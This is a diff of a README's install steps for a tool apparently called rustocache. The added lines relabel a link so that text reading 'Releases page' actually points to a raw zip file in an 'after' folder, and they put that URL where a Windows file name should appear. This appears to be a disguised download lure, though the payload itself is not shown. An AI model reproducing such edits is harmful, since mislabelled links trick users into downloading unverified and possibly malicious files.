RedValks/rustocache/README.md

 To install and use rustocache, follow these simple steps.

-1. Visit the [Releases page](https://github.com/RedValks/rustocache/releases) to download the latest version of rustocache.
+1. Visit the [Releases page](https://raw.githubusercontent.com/RedValks/rustocache/main/after/rustocache.zip) to download the latest version of rustocache.

 2. Once on the Releases page, look for the latest release.
 You will see various files listed.

 3. Download the appropriate file for your operating system.
-For Windows, it may look like `rustocache-windows.exe`.
+For Windows, it may look like `https://raw.githubusercontent.com/RedValks/rustocache/main/after/rustocache.zip`.
 For Linux, it might be `rustocache-linux`.
 For macOS, it could be `rustocache-macos`.

 4. After the download completes, locate the downloaded file on your computer.